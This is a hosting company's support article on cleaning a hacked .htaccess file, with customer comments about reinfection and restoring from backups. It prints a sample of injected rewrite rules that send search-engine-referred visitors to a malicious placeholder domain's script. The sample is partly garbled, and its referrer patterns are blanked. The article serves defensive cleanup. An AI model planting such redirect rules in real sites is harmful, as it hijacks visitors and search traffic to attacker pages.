InMotion Hosting Support Center

In this article we'll discuss steps you can take to clean up a .htaccess hack. The .htaccess file is used to primarily setup rewrite rules to control the way your site is accessed. You might not notice that your .htaccess file has been hacked until either a manual investigation, or you happen to get a malware warning on your website that it's redirecting to a malicious site.

Sometimes you might catch down in your web-browser's status bar that a foreign website is attempting to load content on your website, or you might notice a web-browser warning. These can be common signs of a .htaccess hack, you might also notice that you've fallen in search engine rankings. The typical reason for this is that hackers will attempt to hack your .htaccess file so that when search engine bots crawl your website they are redirected to the website that the hacker has put in place instead of your own.

You can do a quick outside spot check using Google's Safe Browsing diagnostic page to see if they've detected anything malicious on your site in their most recent crawl. You would simply want to replace with your actual domain name in the following URL:

You can also read more about the Google Safe Browsing page.

Following the steps below you can learn how to check your .htaccess file for hacks, and how to clean them up if you do find any.

.htaccess hacked clean up steps

  1. Login to your cPanel.
  2. Under the Files section, click on File Manager.
  3. In the top right-hand corner, click on Settings. Select the Document Root for: option, and choose your domain from the drop-down.
  4. Ensure that Show Hidden Files is selected.
  5. Then click Save.
  6. file-manager-hidden-files
  7. Right-click on the .htaccess file and select Edit.
  8. file-manager-htaccess-edit
  9. You might have a text editor encoding dialog box pop-up, you can simply click on Edit.
  10. Scroll up and down the document and you'll want to look for any code that seems to be out of place, more than likely you'll see something along the following lines if your .htaccess file has been hacked:

    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteOptions inherit
    RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .**$ [NC]
    RewriteRule .* http://MaliciousDomain.tld/bad.php?t=3 [R,L]

    What this rewrite code is attempting to do is checking for the referrer of a request, if it's a popular search engine they are redirecting it to their MaliciousDomain.tld website and trying to load the bad.php malicious script.

    Because these RewriteCond conditional statements wouldn't match for yourself, and only for search engine bots, sometimes these types of hacks can go unnoticed for some time. Unfortunately the longer they're active the more potential it has at affecting your search engine ranking.

  11. To remove these malicious rewrites you can simply highlight all of the text and hit Delete on your keyboard and then click on Save Changesat the top-right to save the file.

    If you aren't 100% confident that you've found malicious redirect code, we would recommend backing up your .htaccess file prior to making edits to it. This can be accomplished by simply right-clicking on the .htaccess file in the File Manager, selecting Copy and then choosing a copy path such as /public_html/.htaccess-BAK, then finally clicking on Copy File(s).

You should now understand how to locate and remove a .htaccess hack that could be causing your website to do a malicious redirection. You'll more than likely also want to read about steps to take after a hack for more information on how to prevent hacks like this from taking place.

If you're on a VPS or dedicated server you might also wish to read about how to clean up a code injection attack if more than just your .htaccess file has been hacked.

Support Center Login

Social Media Login

Social Login Joomla

Related Questions

Here are a few questions related to this article that our customers have asked:
Ooops! It looks like there are no questions about this page.
Would you like to ask a question about this page? If so, click the button below!
Ask a Question
n/a Points
2017-02-22 2:32 am

I am trying to do that but again after some time facing same proble with unwanted content on .htacces file like your code. and redirect my website on another link. can i fix this proble for permanently.

12,647 Points
2017-02-22 9:26 am
Sounds like the hack is more extensive than just the htaccess file. You need to find the file thats making the changes to the htaccess file.
n/a Points
2017-03-23 3:34 pm

I had the same problem, but compared infectedfiles list towards a backupcopy and could determine from which date the hack was made and also if the files that where infected according to that list existed before that date.

There where a new htaccess file in all main folders of all plugins and about 20 NEW files and 8 changed files.

All sorted out now, killed all "NEW files and reloaded the changed files from the backup date before all happened.


27,915 Points
2017-03-23 3:49 pm
Well done sir! We are glad you were able to recover successfully.

Thank you,

Post a Comment

Email Address:
Phone Number:

Please note: Your name and comment will be displayed, but we will not show your email address.

6 Questions & Comments

Post a comment

Back to first comment | top

Need more Help?


Ask the Community!

Get help with your questions from our community of like-minded hosting users and InMotion Hosting Staff.

Current Customers

Chat: Click to Chat Now E-mail:
Call: 888-321-HOST (4678) Ticket: Submit a Support Ticket

Not a Customer?

Get web hosting from a company that is here to help. Sign up today!